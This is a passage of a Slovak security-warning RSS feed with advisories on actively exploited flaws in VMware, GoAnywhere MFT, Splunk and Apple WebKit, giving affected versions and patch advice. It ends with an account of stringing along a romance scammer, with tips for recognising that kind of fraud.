		<pubDate>Mon, 05 Feb 2024 10:38:49 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=285</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>Spoločnosť CISA poukázala na aktívne zneužívanú kritickú zraniteľnosť (CVE-2023-34063), ktorá sa týka chýbajúcej kontroly prístupu a&#160;umožňuje získať neoprávnený prístup k&#160;vzdialeným...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>
<p><strong>Spoločnosť CISA poukázala na aktívne zneužívanú kritickú zraniteľnosť (CVE-2023-34063), ktorá sa týka chýbajúcej kontroly prístupu a&nbsp;umožňuje získať neoprávnený prístup k&nbsp;vzdialeným organizáciam. Výskumník spoločnosti Trend Micro upozornil na zero-day zraniteľnosť (CVE-2023-34048) v&nbsp;produktoch VMware. Zneužitie zraniteľnosti umožňuje autentifikovanému útočníkovi vzdialené vykonávanie kódu. V&nbsp;súčasnosti je vystavených viac ako 2 000 serverov VMware Center týmto zraniteľnostiam.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>VMware Aria Automation (8.11.x, 8.12.x, 8.13.x a 8.14.x) (CVE-2023-34063)</li>



<li>VMware Cloud Foundation (4.x, 5.x)</li>



<li>VMware vCenter Server 7.0, 8.0 (CVE-2023-34048, CVE-2023-34056)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2023-34048 (CVSS skóre 9,8) a CVE-2023-34056 (CVSS skóre 4,3)</strong></p>



<p>Kritická zraniteľnosť CVE-2023-34048 a CVE-2023-34056 sa nachádzajú v&nbsp;serveri vCenter. Chyba CVE -2023-34048 sa&nbsp;týka <strong>zapisovania mimo povolené hodnoty pamäte v&nbsp;implementácii protokolu DCE/RPC </strong>a<strong>&nbsp; umožňuje neoprávnený prístup k údajom</strong>. Úspešné zneužitie umožňuje neautentifikovanému <strong>útočníkovi so sieťovým prístupom ku zraniteľnej inštancii vCenter Server vzdialené vykonávanie kódu.</strong></p>



<p><strong>CVE-2023-34063 (CVSS skóre 9,9)</strong></p>



<p>Kritická zraniteľnosť CVE-2023-34063 sa nachádza v&nbsp;aplikácii Aria Automation a&nbsp;Cloud Foundation a týka sa chýbajúcej kontroly prístupu. <strong>Úspešné zneužitie umožňuje autentifikovanému útočníkovi získať neopravený prístup k&nbsp;vzdialeným organizáciám a workflowom.</strong></p>



<p><strong>Zraniteľnosti CVE-2023-34048 a CVE-2023-34063 sú aktívne zneužívané.</strong></p>



<p><strong>Závažnosť zraniteľnosti: </strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Narušenie integrity a&nbsp;dostupnosti systému</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Možný únik citlivých informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia aplikácie Aria Automation na verziu 8.16, pre zmiernenie chyby CVE-2023-34063. Vzhľadom na to, že neexistuje mitigácia zraniteľnosti CVE-2023-34048, odporúčame dôsledne monitorovať konkrétne sieťové porty 2012/tcp, 2014/tcp a 2020/tcp.</strong></p>



<p><strong>Opravené verzie: </strong></p>



<ul>
<li><strong>VMware vCenter Server 8.0 na 8.0U2</strong></li>



<li><strong>VMware vCenter Server 8.0 na 8.0U1d</strong></li>



<li><strong>VMware vCenter Server 7.0 na 7.0U3o</strong></li>



<li><strong>VMware Cloud Foundation 5.x, 4.x podľa </strong><a href="https://kb.vmware.com/s/article/88287" target="_blank" rel="noreferrer noopener">KB88287</a></li>
</ul>



<p><strong>Odkazy:</strong></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-34063">https://nvd.nist.gov/vuln/detail/CVE-2023-34063</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-34048">https://nvd.nist.gov/vuln/detail/CVE-2023-34048</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-34056">https://nvd.nist.gov/vuln/detail/CVE-2023-34056</a></p>



<p><a href="https://www.securityweek.com/vmware-urges-customers-to-patch-critical-aria-automation-vulnerability/">https://www.securityweek.com/vmware-urges-customers-to-patch-critical-aria-automation-vulnerability/</a></p>



<p><a href="https://thehackernews.com/2024/01/citrix-vmware-and-atlassian-hit-with.html">https://thehackernews.com/2024/01/citrix-vmware-and-atlassian-hit-with.html</a></p>



<p><a href="https://kb.vmware.com/s/article/96098">https://kb.vmware.com/s/article/96098</a></p>



<p><a href="https://socradar.io/patches-available-for-a-critical-vulnerability-in-vmware-aria-automation-cve-2023-34063/">https://socradar.io/patches-available-for-a-critical-vulnerability-in-vmware-aria-automation-cve-2023-34063/</a></p>



<p><a href="https://www.vmware.com/security/advisories/VMSA-2023-0023.html">https://www.vmware.com/security/advisories/VMSA-2023-0023.html</a></p>



<p><a href="https://www.bleepingcomputer.com/news/security/vmware-confirms-critical-vcenter-flaw-now-exploited-in-attacks/">https://www.bleepingcomputer.com/news/security/vmware-confirms-critical-vcenter-flaw-now-exploited-in-attacks/</a></p>



<p><a href="https://thehackernews.com/2024/01/chinese-hackers-silently-weaponized.html">https://thehackernews.com/2024/01/chinese-hackers-silently-weaponized.html</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/285/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v GoAnywhere MFT</title>
		<link>/posts/282</link>
					<comments>/posts/282#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 05 Feb 2024 09:48:33 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Critical]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<guid isPermaLink="false">/?p=282</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/go_anywhereMFT_1-1.jpg" alt="" /></p>V&#160;produkte GoAnywhere Managed File Transfer (MFT) od spoločnosti Fortra bola nájdená bezpečnostná chyba. Úspešné zneužitie chyby umožňuje neautentifikovanému útočníkovi vytvoriť...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/go_anywhereMFT_1-1.jpg" alt="" /></p>
<p><strong>V&nbsp;produkte </strong><strong>GoAnywhere Managed File Transfer (MFT) od spoločnosti</strong> <strong>Fortra bola nájdená </strong><strong>bezpečnostná chyba. Úspešné zneužitie chyby umožňuje neautentifikovanému útočníkovi vytvoriť nového administrátorského používateľa systému. Celkovo 96,4% inštancií používa zraniteľnú verziu systému. </strong><strong></strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<p>Fortra&#8217;s GoAnywhere MFT staršie ako 7.4.1</p>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-0204 (CVSS skóre 9,8 )</strong></p>



<p>Kritická zraniteľnosť CVE-2024-0204 sa nachádza v&nbsp;softvéri GoAnywhere Managed File Transfer (MFT). CVE-2024-0204 <strong>sa týka obídenia autentifikácie a&nbsp;umožňuje neautentifikovanému útočníkovi vytvoriť nového používateľa s&nbsp;administrátorskými oprávneniami.</strong> Chyba je výsledkom <strong>nesprávnej normalizácie cesty pri pokuse o&nbsp;vyžiadanie koncového bodu</strong> <strong>&#8220;/InitialAccountSetup.xhtml&#8221;</strong>. Na zraniteľnosť poukázali výskumníci Mohammed Eldeeb a Islam Elrfai zo spoločnosti Spark Engineering Consultants.</p>



<p><strong>Závažnosť zraniteľnosti: </strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Zvýšenie privilégií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia na verziu 7.4.1 alebo novšiu.</strong></p>



<p><strong>Používateľom, ktorí nemôžu aktualizovať svoj systém na verziu 7.4.1, odporúčame skontrolovať skupinu Admin Users v administratívnom portáli GoAnywhere, či v&nbsp;nej nebol nelegitímne vytvorený nový účet. Ako dočasné riešenie môžete v&nbsp;nekontajnerizovaných nasadeniach odstrániť súbor InitialAccountSetup.xhtml a&nbsp;reštartovať príslušné služby.</strong></p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-0204">https://nvd.nist.gov/vuln/detail/CVE-2024-0204</a></li>



<li><a href="https://thehackernews.com/2024/01/patch-your-goanywhere-mft-immediately.html">https://thehackernews.com/2024/01/patch-your-goanywhere-mft-immediately.html</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/exploit-released-for-fortra-goanywhere-mft-auth-bypass-bug/">https://www.bleepingcomputer.com/news/security/exploit-released-for-fortra-goanywhere-mft-auth-bypass-bug/</a></li>



<li><a href="https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/">https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/282/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Vysoko závažná zraniteľnosť v Splunk Enterprise</title>
		<link>/posts/278</link>
					<comments>/posts/278#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 05 Feb 2024 09:37:23 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ACE]]></category>
		<category><![CDATA[DoS]]></category>
		<guid isPermaLink="false">/?p=278</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/splunk_enterprise_logo.png" alt="" /></p>Spoločnosť Splunk vydala opravy zraniteľností v Splunk Enterprise vrátane chyby s vysokou závažnosťou, ktorá ovplyvňuje inštancie systému Windows. Úspešné zneužitie...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/splunk_enterprise_logo.png" alt="" /></p>
<p><strong>Spoločnosť Splunk vydala opravy zraniteľností v Splunk Enterprise vrátane chyby s vysokou závažnosťou, ktorá ovplyvňuje inštancie systému Windows. Úspešné zneužitie môže umožňovať odmietnutie služby alebo vykonávanie ľubovoľného kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Splunk Enterprise pre Windows 9.0- Splunk Web 9.0.0 až 9.0.7</li>



<li>Splunk Enterprise pre Windows 9.1- Splunk Web 9.1.0 až 9.1.2</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-23678 (CVSS skóre 7,8)</strong></p>



<p class="has-text-align-left"><strong>Vysoko závažná zraniteľnosť</strong> CVE-2023-23678 sa týka len <strong>nástroja Splunk Enterprise pre Windows</strong> a nachádza sa v komponente Splunk Web. <strong>Chyba súvisí s nesprávnou sanitizáciou cesty k súboru</strong>, v ktorom sú uložené serializované dáta a preto môže <strong>viesť k deseralizácii nedôveryhodných údajov z disku </strong>(cesta môže byť útočníkom podvrhnutá). Deserializácia je proces transformácie uložených dát do objektov, s ktorými dokáže program pracovať. <strong>Úspešné zneužitie môže viesť k zneprístupneniu služby</strong> (angl. Denial of Service) <strong>alebo ľubovoľné vykonávanie kódu</strong>.</p>



<p><strong>Závažnosť zraniteľnosti: </strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonávanie ľubovoľného kódu</strong></li>



<li><strong>Odmietnutie služby (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<div class="wp-block-group is-layout-constrained wp-block-group-is-layout-constrained"><div class="wp-block-group__inner-container">
<p><strong>Bezodkladná aktualizácia Splunk Enterprise pre Windows na verzie 9.0.8 a 9.1.3 alebo novšie.</strong> <strong>Pokiaľ sa používatelia neprihlasujú do služby Splunk Web v distribuovanom prostredí, odporúčame vypnúť službu Splunk na týchto inštanciách.</strong></p>



<p><strong>Odkazy:</strong></p>
</div></div>



<ol>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-23678">https://nvd.nist.gov/vuln/detail/CVE-2024-23678</a></li>



<li><a href="https://www.securityweek.com/high-severity-vulnerability-patched-in-splunk-enterprise/">https://www.securityweek.com/high-severity-vulnerability-patched-in-splunk-enterprise/</a></li>



<li><a href="https://advisory.splunk.com/advisories/SVD-2024-0108">https://advisory.splunk.com/advisories/SVD-2024-0108</a></li>



<li><a href="https://hazelcast.com/glossary/deserialization/">https://hazelcast.com/glossary/deserialization/</a></li>
</ol>
]]></content:encoded>
					
					<wfw:commentRss>/posts/278/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zero-day zraniteľnosť v Apple</title>
		<link>/posts/275</link>
					<comments>/posts/275#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 05 Feb 2024 09:29:01 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[Zero-day]]></category>
		<guid isPermaLink="false">/?p=275</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/apple_logo_1988-e1732265458470.webp" alt="" /></p>Spoločnosť Apple vydala aktualizáciu pre zero-day zraniteľnosť CVE-2024-23222, ktorá môže viesť k&#160; vykonávaniu ľubovoľného kódu. Chyba je aktívne zneužívaná. Zraniteľné...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/apple_logo_1988-e1732265458470.webp" alt="" /></p>
<p><strong>Spoločnosť Apple vydala aktualizáciu pre zero-day zraniteľnosť CVE-2024-23222, ktorá môže viesť k&nbsp; vykonávaniu ľubovoľného kódu. Chyba je aktívne zneužívaná.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>iPhone 8, iPhone 8 Plus, iPhone X, iPhone XS a novšie</li>



<li>iPad 5. generácia,iPad Pro a iPad Pro 1. generácia, iPad Pro 2. generácia a novšie</li>



<li>iPad Air 3. generácia a novšie, iPad 6. generácia a novšie, iPad mini 5. generácia a novšie</li>



<li>Mac s macOS Monterey a novšie</li>



<li>Apple TV HD a Apple TV 4K</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-23222</strong></p>



<p>Zero-day zraniteľnosť CVE-2024-23222 sa <strong>nachádza vo frameworku WebKit a umožňuje útočníkovi ľubovoľné vykonávanie kódu</strong>. <strong>Chyba sa týka nedostatočného overenia typu premennej frameworku WebKit</strong>, pre webový prehliadač Safari. Úspešné zneužitie si <strong>vyžaduje, aby obeť otvorila škodlivú webovú stránku</strong>.</p>



<p><strong>Zero-day zraniteľnosť je aktívne zneužívaná.</strong></p>



<p><strong>Závažnosť zraniteľnosti: </strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Ľubovoľné vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia tvOS 17.3, iOS 17.3 a iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 a iPadOS 16.7.5, Safari 17.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3. alebo na najnovšiu verziu.</strong></p>



<p><strong>Odkazy</strong>:</p>



<ul>
<li><a href="https://thehackernews.com/2024/01/apple-issues-patch-for-critical-zero.html">https://thehackernews.com/2024/01/apple-issues-patch-for-critical-zero.html</a></li>



<li><a href="https://www.bleepingcomputer.com/news/apple/apple-fixes-first-zero-day-bug-exploited-in-attacks-this-year/">https://www.bleepingcomputer.com/news/apple/apple-fixes-first-zero-day-bug-exploited-in-attacks-this-year/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-23222">https://nvd.nist.gov/vuln/detail/CVE-2024-23222</a></li>
</ul>



<p></p>



<p></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/275/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Vyskúšali sme za vás: Romantickí podvodníci</title>
		<link>/posts/561</link>
					<comments>/posts/561#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 02 Feb 2024 12:40:28 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<category><![CDATA[Dating scam]]></category>
		<category><![CDATA[Scam]]></category>
		<guid isPermaLink="false">/?p=561</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/romanticki-podvodnici-2.jpg" alt="" /></p>Pravdepodobne ste o nich počuli alebo čítali, no nepripúšťate si, že by sa to mohlo stať aj Vám. Skutočnosť je...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/romanticki-podvodnici-2.jpg" alt="" /></p>
<p><strong>Pravdepodobne ste o nich počuli alebo čítali, no nepripúšťate si, že by sa to mohlo stať aj Vám. Skutočnosť je však temnejšia, ako predpokladáme a&nbsp;romantické podvody sú bohužiaľ každodennou praxou. Ako takýto podvod vyzerá, ako komunikuje podvodník so svojou obeťou a&nbsp;aké triky používa? Vyskúšali sme za Vás a&nbsp;prinášame Vám skúsenosti a&nbsp;rady, ako podobné aktivity prekuknúť hneď na začiatku.</strong></p>



<p>Jedného zimného večera sedíme v&nbsp;ospalej atmosfére príjemne vyhriatej izby. Ventilátor počítača jemne pradie. Svetlo monitora mäkko dopĺňa svit samostatne stojacej náladovej lampy. Prechádzame svoj manažér hesiel Keepass, keď nám oči padnú na náš starý účet na Pokeci. Skúšame či funguje&nbsp;a s&nbsp;prekvapením zisťujeme, že táto služba sa aj dnes teší nemalej obľube. Nejaký čas sa preklikávame jej funkciami a&nbsp;používateľmi, až nám zasvieti červený bodík s&nbsp;číslom 1 nad položkou „Stretko“ – „Zaujímajú sa o teba“. So zdvihnutým obočím klikáme na lákavú položku a&nbsp;po načítaní obsahu by naše obočie pokojne vyhralo olympijskú medailu v&nbsp;skoku do výšky. Ukazuje sa nám obrázok veľmi sympatickej blonďavej slečny. Píšeme jej zopár slov na úvod a&nbsp;nechávame večer lenivo plynúť ďalej.</p>



<p>Nasledujúci večer si nachádzame od slečny správu, že je rada, že sme sa spoznali a&nbsp;či by sme si radšej nepísali cez e-mail. V&nbsp;tom momente náš chladnúci záujem vystrieda&nbsp;v&nbsp;hlave blikajúce červené svetielko. Púšťame sa do niekoľkomesačnej e-mailovej konverzácie s&nbsp;podvodníkom, aby sme na vlastnej koži vyskúšali, ako vyzerá skutočný romance scam, alebo romantický podvod. Z&nbsp;lovca sa práve stala korisť&#8230;</p>



<p>Ďalším varovným signálom, ktorý sme si všimli, je vek konta. Podvodník si ho vytvoril len niekoľko dní predtým, ako nám napísal. Sociálne siete a&nbsp;zoznamovacie služby často monitorujú profily používateľov a&nbsp;ich námietky. Podvodné profily sa teda na ich serveroch dlho neohrejú. Preto sa snažia podvodníci presmerovať konverzáciu v&nbsp;krátkom čase na iný, menej monitorovaný kanál. Môže to byť e-mail, WhatsApp alebo podobná komunikačná platforma.</p>



<p>E-mailová komunikácia prebieha v&nbsp;<strong>s</strong>lovenčine. Zloženie viet naznačuje, že podvodník píše v&nbsp;angličtine a používa službu Google Translate alebo jej obdobu. Toto je ďalší typický znak, že sa jedná o&nbsp;podvod. Zločinci sa často snažia viesť komunikáciu v&nbsp;materskom jazyku obete, aby vzbudili väčšie sympatie a&nbsp;aby mohli viesť svoje operácie aj s&nbsp;obeťami, ktoré nie sú jazykovo podkuté.</p>



<p><strong>Spoznávanie sa</strong></p>



<p>Aby sme uviedli veci na pravú mieru, celú dobu vystupujeme pod falošným menom a&nbsp;vymyslenou identitou. V&nbsp;druhom e-maili od fingovanej 30-ročnej dievčiny menom Natalya sa dozvedáme, že žije v&nbsp;Rusku v&nbsp;mestečku Dmitrov neďaleko Moskvy a&nbsp;pracuje ako sekretárka na&nbsp;miestnej polícii. Pýta sa nás na&nbsp;naše záľuby a&nbsp;prácu. Hľadá si vážnu známosť, šikovného a skúseného muža, s&nbsp;ktorým bude stáť za to budovať vzťah.</p>



<p>Samozrejme, tým vyvoleným mužom sme my, nech by sme sa prezentovali hocijakým spôsobom. Odpisovaniu nevenujeme veľa času a&nbsp;myšlienok. Naopak, snažíme sa otázkami zahltiť podvodníka, aby sme mu zobrali čo najviac času, ktorý by mohol venovať svojim skutočným obetiam. Na mnohé jeho otázky nereagujeme a&nbsp;zvyšné odbíjame s&nbsp;nádychom sarkazmu. Chceme zistiť, ako sa podvodník zachová. Nepohlo to s ním a&nbsp;píše nám, akoby nás vnímal ako zaujímavého a výnimočného človeka.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="890" height="254" src="/wp-content/uploads/2024/02/scam01.jpg" alt="" class="wp-image-575"/><figcaption class="wp-element-caption">Naša 3. odpoveď z&nbsp;15.12.2021 v&nbsp;ktorej sme reagovali sarkasticky. „Natalyu“ to neodradilo. Bolo to len kvôli jej nedostatkom v&nbsp;slovenčine?</figcaption></figure>



<p>Zo začiatku nám ku každej správe posiela „svoje“ fotky. &nbsp;Pri pohľade na ne na zlomok sekundy máme nádej, že naozaj ide iba o dievča, ktoré sa túži dostať zo svojej&nbsp;krajiny na západ. Spolu je ich až 29. Aj preto je ľahké uveriť, že ide o&nbsp;skutočné fotky človeka, s&nbsp;ktorým obeť komunikuje. Podvodníci však fotografie atraktívnych ľudí vedia ľahko získať z&nbsp;cudzích profilov na sociálnych sieťach, či ukradnúť z&nbsp;cloudových služieb. Často dokážete podvod odhaliť reverzným vyhľadávaním fotografií cez služby ako TinEye.com, či Google Image search. Nie je to však pravidlom. Schodnou cestou pre získanie nových fotografií je pre podvodníka tiež použiť Vaše fotky, o&nbsp;ktoré vás žiada v&nbsp;priebehu konverzácie, pri jeho ďalšej obeti. „Natalya“ si prirodzene vypýtala fotky už v&nbsp;prvých e-mailoch. Zahovorili sme to tým, že sa neradi fotíme a&nbsp;že ženy vraj nepotrebujú vidieť fotky tak veľmi ako muži. Zabralo to a&nbsp;tému už neotvára.</p>



<p><strong>Nikdy neposielajte svoje nahé fotografie, aby ste druhej strane nedali nástroj, ktorým vás môže ľahko vydierať. Toto pravidlo sa oplatí dodržiavať aj v&nbsp;rámci skutočných partnerstiev. Na internete existujú stránky, kde sa jedinci, ktorí neunesú rozchod, mstia svojim bývalým partnerom zverejnením ich kompromitujúcich fotografií.</strong></p>


<div class="wp-block-image is-resized">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="670" height="649" src="/wp-content/uploads/2024/02/scam03.jpg" alt="" class="wp-image-573"/><figcaption class="wp-element-caption">Prvé fotografie „Natalye“, ktoré nám poslala e-mailom. Jedná sa o&nbsp;veľmi atraktívnu mladú ženu, ktorá je v&nbsp;podvode pravdepodobne tiež obeťou – ktorej fotografie boli odcudzené.</figcaption></figure></div>

<div class="wp-block-image is-resized">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="562" height="755" src="/wp-content/uploads/2024/02/scam02.jpg" alt="" class="wp-image-574"/><figcaption class="wp-element-caption">Na tejto fotografii je viditeľný nápis na lodi v&nbsp;azbuke „Kapitánsky klub“.</figcaption></figure></div>


<p>Prvé fotografie „Natalye“, ktoré nám poslala e-mailom. Jedná sa o&nbsp;veľmi atraktívnu mladú ženu, ktorá je v&nbsp;podvode pravdepodobne tiež obeťou – ktorej fotografie boli odcudzené. Na prvej fotografii je viditeľný nápis na lodi v&nbsp;azbuke „Kapitánsky klub“.</p>



<p>Ako píšeme vyššie, naša „Natalya“ začína prejavovať záujem o&nbsp;nás nezvyčajne skoro, bez toho, aby sa nás predtým pokúsila bližšie spoznať. V&nbsp;druhej správe z&nbsp;13.12.2021 nám prezrádza, že je nezadaná a&nbsp;hľadá vážny vzťah. Pýta sa nás, akú ženu hľadáme. O&nbsp;dve správy neskôr píše, že chce mužovi odovzdať všetku svoju lásku a&nbsp;vášeň, je veľmi osamelá a potrebuje vážny vzťah. Iba týždeň po prvom e-maili sa nás už pýta, či si myslíme, že by sme mohli byť spolu.</p>


<div class="wp-block-image is-resized">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="773" height="600" src="/wp-content/uploads/2024/02/scam04.jpg" alt="" class="wp-image-572"/><figcaption class="wp-element-caption">2. správa z&nbsp;13.12.2021</figcaption></figure></div>

<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="596" height="599" src="/wp-content/uploads/2024/02/scam05.jpg" alt="" class="wp-image-571"/><figcaption class="wp-element-caption">5. správa zo 17.12.2021</figcaption></figure></div>


<p>Následne nám už nepriamo vyznáva lásku slovami „môžem len sľúbiť oddanosť“ a&nbsp;túžbu po stretnutí. Nasledujú&nbsp;vzletné a nadšené slová zaľúbenej ženy na celý odstavec: „Vieš, mám pocit, že každá nová správa je malé rande ;)“. Je 21.12.2021 a&nbsp;prijali sme siedmy e-mail. Dva dni nato dostávame správu so slovami<strong>:</strong>&nbsp;„Bola som veľmi osamelá. Ale teraz som našla skutočného muža, princa 21. storočia ;)“. Pritom sme písali pomerne neutrálne odpovede. Keby to v&nbsp;skutočnosti bolo také jednoduché, mnoho mužov by sa potešilo.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="894" height="792" src="/wp-content/uploads/2024/02/scam06.jpg" alt="" class="wp-image-570"/><figcaption class="wp-element-caption">8. správa z&nbsp;23.12.2021</figcaption></figure></div>


<p>8. správa z&nbsp;23.12.2021</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="896" height="246" src="/wp-content/uploads/2024/02/scam07.jpg" alt="" class="wp-image-569"/><figcaption class="wp-element-caption">E-mail, ktorý predchádzal vyznaniu, že „Natalya“ našla skutočného muža a&nbsp;princa 21. storočia v 8. správe z&nbsp;23.12.2021. Ani sme sa veľmi nesnažili :). Čo to hovorí o&nbsp;mužoch, ktorých úbohá „Natalya“ stretáva vo svojej domovine?</figcaption></figure></div>


<p>E-mail, ktorý predchádzal vyznaniu, že „Natalya“ našla skutočného muža a&nbsp;princa 21. storočia v 8. správe z&nbsp;23.12.2021. Ani sme sa veľmi nesnažili :). Čo to hovorí o&nbsp;mužoch, ktorých úbohá „Natalya“ stretáva vo svojej domovine?</p>



<p>Tesne po Vianociach dostávame od „Natalye“ sladký e-mail s prvými sexuálnymi narážkami: „&#8230;Ako keby sme boli spolu v&nbsp;posteli? Alebo ako ti uvarím raňajky len v&nbsp;košeli <img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Myslím, že budeme dobrý pár.“ Hneď nato chce prejsť do ďalšej fázy vzťahu, používa otvorenejšie sexuálne narážky, začína nás volať „drahý“. A&nbsp;prichádza návrh, že pricestuje na návštevu. Pýta si našu adresu a&nbsp;názov letiska.&nbsp;Zdá sa, že našu odpoveď na tento e-mail „Natalya“ nedostala, alebo sa e-mail stratil v&nbsp;spame, no po objasnení situácie začne naplno plánovať svoj príchod a&nbsp;vzbudzuje v&nbsp;nás obrazové predstavy, aké to bude, keď budeme konečne spolu. Chce skypovať. Súhlasili sme, no vraj nemá doma kameru. Dohodla sa s&nbsp;kamarátom, ktorý kameru má, že bude volať od neho. Púšťame to dostratena, nechceme prezradiť našu indentitu.</p>



<p>O&nbsp;tri dni neskôr, 18.01.2022<strong>,</strong> organizuje „Natalya“ prílet. Píše, že cena za letenky a&nbsp;dokumenty je celkovo 764 Eur. Nemá aktuálne toľko peňazí, čo nás neprekvapuje. Pýta si od nás časť nákladov v&nbsp;sume 447 Eur: „Potrebujem 447 eur. Môžem sa na teba spoľahnúť?“ Toto sa deje jeden mesiac a&nbsp;týždeň od prvého e-mailu, ktorý sme si vymenili.&nbsp;Keď situáciu naťahujeme, podvodník začína komunikovať menej. „Natalya“ ochladla. Keď jej nadbiehame, dáva nám znova šancu. Tlačí na nás, aby sme sa rozhodli, či sa chceme stretnúť alebo či to chceme ukončiť. Dňa 31.1.2022 si opäť pýta sumu 447 Eur. Opäť začína písať dlhšie e-maily a&nbsp;opäť je prehnane romantická.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="841" height="264" src="/wp-content/uploads/2024/03/image-1.png" alt="" class="wp-image-576" style="width:860px;height:auto"/><figcaption class="wp-element-caption">                 16. správa z 25.1.2022</figcaption></figure></div>

<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" src=":8000/wp-content/uploads/2022/09/scam09-1.jpg" alt="" class="wp-image-3001"/><figcaption class="wp-element-caption">18. správa z&nbsp;28.1.2022 – opäť vrelšia po našom dobiedzaní</figcaption></figure></div>


